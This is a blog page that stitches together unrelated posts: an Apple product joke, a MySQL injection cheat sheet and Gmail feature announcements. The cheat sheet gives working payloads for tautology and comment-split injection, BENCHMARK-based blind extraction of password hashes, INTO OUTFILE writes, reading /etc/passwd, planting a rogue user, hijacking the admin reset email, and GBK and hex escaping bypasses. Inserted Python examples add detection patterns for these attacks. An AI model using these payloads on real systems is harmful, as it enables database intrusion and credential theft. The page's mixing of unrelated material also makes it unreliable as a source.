Note: Most of the articles on this blog have been taken from other reputable blogs and websites, so the author is not responsible for any issues.

After the iPad? The iBoard and iMat


Most people don't like the way Apple rolls out products. The company releases a device, only to roll out the "next version" a year later. The newer model usually contains only a few minor tweaks, which could have been implemented on the original (copy and paste on the iPhone, anyone?).

It was this mindset that had people criticizing the iPad. "It's just a giant iPhone," they said. "It even runs the same OS as the iPhone and iPod Touch!" Well, here's one for the people who think Apple's line of products has gotten just a bit too linear.
The folks over at begeek.fr have predicted the next two iterations of the Apple iPad. Behold! The iBoard and the iMat!

MySQL Injection Cheat Sheet Basics

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION()
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

all render TRUE or 1.

Evaluate

SELECT 0.1 <= 2; SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
This takes around 5 seconds on localhost.

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
This takes around 7 seconds on localhost.

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
This takes around 70 seconds on localhost.

Using the delay to check whether a user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of the number of rounds: add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes (example):

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

Note: you must specify a new file (it must not already exist) and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

Explanation: SUBSTRING(passwordfield, startcharacter, selectlength)

(password,1,2) selects 'ab'
(password,1,3) selects 'abc'
(password,1,4) selects 'abcd'

A quoteless example:

SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible characters: 0 to 9 (ASCII 48 to 57) and a to z (ASCII 97 to 122)

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve the /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user table out to /tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change the admin e-mail, for "forgot login" retrieval.

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';
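A defender's view of the vectors listed in the Basics, Benchmark and Misc sections above, as an added Python example that is not part of the cheat sheet: it strips the inline comments used to split keywords, then flags the indicators this page enumerates (tautologies, BENCHMARK delays, stacked statements, INTO OUTFILE, LOAD DATA INFILE, reads of the mysql privilege tables). The sample statements are constructed from the page's own vectors in the form they would appear in MySQL's general query log; the rule names are this example's choices.

```python
import re

# Constructed sample statements modelled on the vectors in this cheat sheet, in the
# form they would appear in MySQL's general query log (not real captured traffic).
SAMPLE_QUERIES = [
    "SELECT * FROM login WHERE id = 42",
    "SELECT * FROM login WHERE id = 1 or 1=1",
    "SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1",
    "SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()",
    "SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login",
    "SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/tmp/p.txt'",
    'load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = \'r00t\'',
    "SELECT name FROM products WHERE category = 'books' /* cached */",
]

# Letters directly on both sides of an inline comment: WHE/**/RE, o/**/r.
SPLICED_KEYWORD = re.compile(r"[A-Za-z]/\*.*?\*/[A-Za-z]")

# Applied after comments are stripped, so the spliced variants are caught as well.
RULES = [
    ("tautology", re.compile(r"\bor\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based probe", re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.I)),
    ("stacked statement", re.compile(r";\s*\w")),  # a ';' inside a literal would false-positive
    ("file write", re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b", re.I)),
    ("file read", re.compile(r"\bLOAD\s+DATA\s+(LOCAL\s+)?INFILE\b", re.I)),
    ("privilege table access", re.compile(r"\bmysql\.(user|db)\b", re.I)),
]

def normalize(query: str) -> str:
    """Drop /* */ comments and collapse whitespace. Note that this also drops
    /*! ... */ version comments, which MySQL itself would execute."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", "", query, flags=re.S)).strip()

def scan(query: str) -> list:
    """Return the names of every indicator present in one logged statement."""
    hits = ["comment-spliced keyword"] if SPLICED_KEYWORD.search(query) else []
    normalized = normalize(query)
    hits.extend(name for name, pattern in RULES if pattern.search(normalized))
    return hits

def scan_all(queries) -> dict:
    """Map each flagged statement to its indicators; clean statements are omitted."""
    return {q: hits for q in queries if (hits := scan(q))}

if __name__ == "__main__":
    for query, hits in scan_all(SAMPLE_QUERIES).items():
        print(f"{', '.join(hits):<42} {query}")
```

Pattern rules like these are a triage aid for query logs, not a replacement for parameterized queries: the two clean statements pass, the six modelled on the page are each flagged with the matching reason.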

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"

the above chars are Chinese Big5
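Why the 0xbf27 prefix above defeats byte-level escaping, and the check that closes the gap, as an added example that is not from the cheat sheet: it simulates addslashes() on raw bytes and shows that once the server decodes the result as GBK, the inserted backslash is absorbed as the trail byte of a two-byte character and the quote survives unescaped. The hardened form decodes strictly in the connection charset before escaping (the same idea behind telling mysql_real_escape_string() the connection charset) and rejects malformed input; all function names are this example's own, not PHP or MySQL APIs.

```python
from typing import Optional

# All function names here are this example's own, not PHP or MySQL APIs.

def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-at-a-time escaping in the style of PHP's addslashes(): it cannot
    know which bytes belong together as one multibyte character."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)  # prepend a backslash
        out.append(b)
    return bytes(out)

def quote_neutralized(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes the way the server will and check that every
    single quote is still preceded by a backslash."""
    text = escaped.decode(charset, errors="replace")
    return all(i > 0 and text[i - 1] == "\\" for i, ch in enumerate(text) if ch == "'")

def safe_escape(raw: bytes, charset: str) -> Optional[bytes]:
    """Hardened form: decode strictly in the connection charset, escape at the
    character level, then re-encode. Malformed input is rejected (returns None)."""
    try:
        text = raw.decode(charset)  # 0xBF followed by 0x27 is not a valid GBK sequence
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)

# Constructed inputs: the cheat sheet's 0xbf27 prefix, and a legitimate GBK string.
INJECTED = b"\xbf'admin"
LEGIT = "\u554a'admin".encode("gbk")  # the character 啊 followed by a quote

if __name__ == "__main__":
    escaped = addslashes_bytes(INJECTED)
    print(escaped.hex())                          # bf5c27...: 0xBF 0x5C is one GBK character
    print(quote_neutralized(escaped, "latin-1"))  # True, what the application assumed
    print(quote_neutralized(escaped, "gbk"))      # False, what the server actually sees
    print(safe_escape(INJECTED, "gbk"))           # None, rejected as malformed
    print(quote_neutralized(safe_escape(LEGIT, "gbk"), "gbk"))  # True
```

Parameterized queries sidestep the problem entirely, because the value is never spliced into statement text for the parser to interpret.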

Advanced Vectors
Using a HEX-encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = 'root', pass = 'root'

Bypass:

insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determine the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then prefix it with 0x:

0x726F6F74

A preview of Gmail’s new look

We get a lot of great feedback about how Gmail helps you be more efficient, keep in touch with family and friends, and get work done. We’ve saved you from forgetting attachments and made sure that you got the right Bob. Over the years, adding countless features to Gmail has made it an increasingly powerful communication hub, but along the way the interface has also become more cluttered and complex.

That’s one of the reasons we’re embarking on a series of interface updates to help strip out unnecessary clutter and make Gmail as beautiful as it is powerful. This is part of a Google-wide effort to bring you an experience that’s more focused, elastic, and effortless across all of our products. The changes are not going to happen all at once. We know that you love and care about Gmail as much as we do, and we’ll be working on these upgrades gradually over the next few months to allow plenty of time to understand and incorporate your feedback into the evolving design.

We’re kicking things off with two new themes for you to try out as a sort of sneak peek at what we’re up to. Starting today, you’ll see the “Preview” and “Preview (Dense)” themes in the Themes tab in Gmail Settings. Why two themes? Our new interface will eventually expand dynamically to accommodate different screen sizes and user preferences, but until then you can pick the information density that you prefer. 

Here’s what one of the new themes currently looks like:



And in conversation view:


Click the images above to see larger versions.

If you poke around you’ll hopefully find a lot to like and a much cleaner, modern look but also few rough edges. In particular, some Labs features may look a little strange in the new themes. We plan to fix these issues as we roll out changes in the coming months. You can also expect some updated themes that embody the same design principles but are better suited to working in a dark environment, use a different color palette, or include the illustrations that we know many of you love to see around your inbox.

Look out for these and other new features over the next few months. In the meantime, try out the new themes as a preview of the future of Gmail and let us know what you think.

P.S. Like Gmail, Google Calendar is also getting a new look. You’ll see it automatically within the next few days, so there’s no need to turn it on, and we’ll also continue to make improvements there in the coming months. Details about the current changes to Calendar can be found in the Calendar help center.

New! Pick your favorite inbox style

Ever felt like there should be a better way to manage your inbox? There are already lots of different ways: some people read everything, some mark messages they need to take action on with stars, and others like to have their important email separated from the rest automatically — something Gmail started offering last year with Priority Inbox.

Over the coming weeks, we're rolling out several new inbox styles to help you manage your mail in the way that works best for you. Once it’s turned on for your account, you can easily choose a style from the tabs at the top of your inbox:

  • Classic - This is the default inbox style most people are used to. In the Classic inbox, messages are ordered chronologically, with your most recent email at the top.
  • Priority Inbox - Important and unread messages appear at the top of your inbox, then starred messages, then everything else. Each section can be customized further, so you can create your own inbox style.
  • Important first - This style puts important mail at the top of the page (both read and unread messages). Everything else is in its own section at the bottom of your inbox. You may have noticed that we turned on importance arrows for everyone a few weeks ago; this inbox style separates messages with these arrows from those without.
  • Unread first - Simple: unread mail at the top; everything else at the bottom.
  • Starred first - Starred messages at the top; everything else at the bottom.
After you've settled on a style you like and used it for about a week, these tabs will go away. You can always change your inbox style from the drop-down menu next to the Inbox label or from the Settings page.



So try on a new inbox style and see what fits you best!